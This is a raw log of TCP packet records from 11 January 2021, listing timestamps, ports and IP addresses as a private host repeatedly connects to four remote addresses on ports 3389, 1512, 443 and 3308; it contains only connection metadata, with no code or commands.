Jan 11, 2021 16:52:33.702148914 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:33.702266932 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:33.703804016 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:33.757360935 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:33.795013905 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:33.795042038 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:33.795198917 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:33.808331013 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:33.874422073 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:33.874624968 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:33.879684925 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:33.879796982 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:33.933753967 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:33.933974028 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:33.973526955 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:33.988392115 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:33.988426924 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:34.077733040 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:34.077760935 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:34.077883959 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:34.077948093 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:34.080789089 CET	49199	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:34.134345055 CET	3389	49199	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:34.191328049 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.244208097 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.244285107 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.245362043 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.300785065 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.305150986 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.305167913 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.305212975 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.305234909 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.318192959 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.375721931 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.375840902 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.381309986 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.381429911 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.434180975 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.434293032 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.472455978 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.487128019 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.487150908 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.586950064 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.586982012 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.587150097 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.590878010 CET	49200	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:34.643769979 CET	1512	49200	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:34.704054117 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:34.756494045 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:34.756719112 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:34.757365942 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:34.809643030 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:34.824404001 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:34.824561119 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:34.857903004 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:34.912842989 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:34.913115978 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:35.033560038 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:35.033684969 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:35.086123943 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:35.086255074 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:35.122787952 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:35.138482094 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:35.138632059 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:35.256388903 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:35.256436110 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:35.256539106 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:35.260385036 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:35.261332035 CET	49201	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:35.314013004 CET	443	49201	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:35.376142979 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.420006990 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.420114040 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.421354055 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.464509964 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.475033998 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.475066900 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.475184917 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.477828026 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.668044090 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.713165045 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.713320017 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.724309921 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.724509001 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.767566919 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.767746925 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.806863070 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.811400890 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.811419010 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.923542976 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.923585892 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:35.923722029 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.929294109 CET	49202	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:35.972572088 CET	3308	49202	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:36.144197941 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.202347040 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.202496052 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.203717947 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.257457018 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.272130013 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.272154093 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.272209883 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.272382975 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.281553030 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.345818043 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.345943928 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.352437973 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.352603912 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.406461000 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.406725883 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.447766066 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.460645914 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.460690022 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.549935102 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.549969912 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:36.550230026 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.663640976 CET	49203	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:36.717590094 CET	3389	49203	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:37.934911013 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:37.989794016 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:37.989866018 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:37.990668058 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.045413017 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.050998926 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.051023960 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.051069975 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.051095963 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.061062098 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.115130901 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.115350962 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.121114969 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.121340990 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.174034119 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.174231052 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.212490082 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.226903915 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.326378107 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.326426983 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.326730967 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.332643986 CET	49204	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:38.385427952 CET	1512	49204	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:38.449894905 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.502501011 CET	443	49205	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:38.502676010 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.513366938 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.565740108 CET	443	49205	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:38.580311060 CET	443	49205	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:38.580463886 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.594999075 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.649549007 CET	443	49205	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:38.649751902 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.655251026 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.655401945 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.707581043 CET	443	49205	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:38.707750082 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.760771990 CET	443	49205	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:38.877583981 CET	443	49205	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:38.877615929 CET	443	49205	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:38.877686977 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.877748013 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.880346060 CET	49205	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:38.932413101 CET	443	49205	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:39.008312941 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.051888943 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.051996946 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.053759098 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.162534952 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.358046055 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.358136892 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.401484966 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.401617050 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.410176039 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.456259012 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.456446886 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.466806889 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.467221975 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.510200977 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.510341883 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.550966978 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.553247929 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.553366899 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.665194988 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.665213108 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.665314913 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.668256044 CET	49206	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:39.711141109 CET	3308	49206	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:39.775197029 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:39.830429077 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:39.830499887 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:39.831300974 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:39.885612011 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:39.901623964 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:39.901640892 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:39.901684046 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:39.906995058 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:39.968058109 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:39.968204975 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:39.972306967 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:39.972394943 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:40.026571989 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:40.026727915 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:40.066538095 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:40.080859900 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:40.080883026 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:40.170964003 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:40.170993090 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:40.171189070 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:40.171236992 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:40.176785946 CET	49207	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:40.230535984 CET	3389	49207	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:40.289589882 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.342739105 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.342833042 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.343955040 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.396661997 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.404150963 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.404195070 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.404254913 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.404328108 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.411192894 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.465285063 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.465514898 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.470693111 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.470875978 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.523619890 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.523979902 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.560621023 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.576874018 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.576927900 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.673281908 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.673332930 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.673573971 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.682252884 CET	49208	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:40.735052109 CET	1512	49208	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:40.794322968 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:40.846185923 CET	443	49209	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:40.846358061 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:40.848432064 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:40.900145054 CET	443	49209	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:40.914674997 CET	443	49209	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:40.914804935 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:40.922489882 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:40.976758003 CET	443	49209	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:40.977025032 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:40.987370968 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:40.988552094 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:41.040375948 CET	443	49209	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:41.040715933 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:41.092538118 CET	443	49209	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:41.212901115 CET	443	49209	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:41.212928057 CET	443	49209	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:41.213175058 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:41.216289043 CET	49209	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:41.268034935 CET	443	49209	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:41.326389074 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.370177984 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.370436907 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.371855021 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.417213917 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.429805994 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.429835081 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.429883003 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.429907084 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.442131042 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.488266945 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.488462925 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.493194103 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.493429899 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.536530972 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.536710978 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.575947046 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.579709053 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.579729080 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.691102982 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.691126108 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.691308022 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.694274902 CET	49210	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:41.737200975 CET	3308	49210	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:41.808582067 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:41.863668919 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:41.863775969 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:41.865150928 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:41.920021057 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:41.945065975 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:41.945091009 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:41.945158958 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:41.950371027 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:42.010579109 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:42.010850906 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:42.021250963 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:42.021522999 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:42.076616049 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:42.076853037 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:42.115431070 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:42.131691933 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:42.131725073 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:42.222064972 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:42.222094059 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:42.222224951 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:42.222296000 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:42.224488020 CET	49211	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:42.281521082 CET	3389	49211	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:42.333112955 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.386043072 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.386157990 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.387706041 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.440644979 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.448364019 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.448396921 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.448543072 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.448581934 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.462424994 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.516506910 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.516702890 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.524580956 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.524967909 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.578514099 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.578598022 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.619273901 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.631414890 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.631460905 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.733191967 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.733252048 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.733369112 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.736248970 CET	49212	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:42.789211988 CET	1512	49212	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:42.851969004 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:42.904489040 CET	443	49213	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:42.904587984 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:42.905509949 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:42.957402945 CET	443	49213	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:42.972027063 CET	443	49213	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:42.972167969 CET	49213	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:42.983890057 CET	49213	443	192.168.2.22	77.220.64.37
